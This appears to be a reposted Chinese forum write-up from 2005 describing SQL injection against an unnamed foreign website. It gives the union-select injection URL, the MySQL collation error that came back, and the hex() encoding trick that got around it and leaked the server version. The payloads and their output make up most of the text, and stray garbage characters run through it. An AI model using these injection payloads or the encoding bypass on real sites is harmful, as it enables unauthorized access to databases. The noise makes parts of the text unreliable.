本文作者:SuperHei7 N4 n& Z% f- c: K3 F
文章性质:原创
0 c! E. W' l$ h G# Y7 j8 f发布日期:2005-10-18
8 i* C' t9 T p4 `! `9 u4 a( l测试个国外的站时:7 f$ p& ?; r! c1 a7 J7 c
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
/ c6 s% ^4 ~( ?9 K/ }& S返回错误:. ]( ?/ ?, _0 g' ^
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
9 }7 Y0 l& C$ Q2 i9 ^9 p" lMySQL Error No. 126/ n* f7 M J% [; m! K& } D
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
6 v- e) P; `) P1 d5 \解决办法:转为其他编码如hex。
4 v3 e9 @' |1 p/ k: ]. D' f8 c# Yurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
0 F6 M5 V! k2 {成功得到hex(version())的值为:
8 C9 p* e. t [7 s6 E342E312E332D626574614 z( s- Q* K. F/ M* l
回Mysql查询下得到:
7 v Z8 O R0 H4 S! @+ @mysql> select 0x342E312E332D62657461; h9 N6 D6 w' x" l C+ H
+------------------------+8 U, r. ?, G* W C! w& C9 c
| 0x342E312E332D62657461 |% _: E; l; h2 q. ?5 v
+------------------------+
0 h; e- Q! R" j+ x2 `# m4 ]( c| 4.1.3-beta |
6 a! P: Y& `+ A, _; U5 b+------------------------+: @- ?2 K) _' G: Z; B8 B% [
1 row in set (0.00 sec)
3 x- Z$ V" E0 ?" f/ h5 A: s) U
" `; U% k+ Z0 K% | |
发表于 2012-9-15 14:04:54
收藏
分享
支持
反对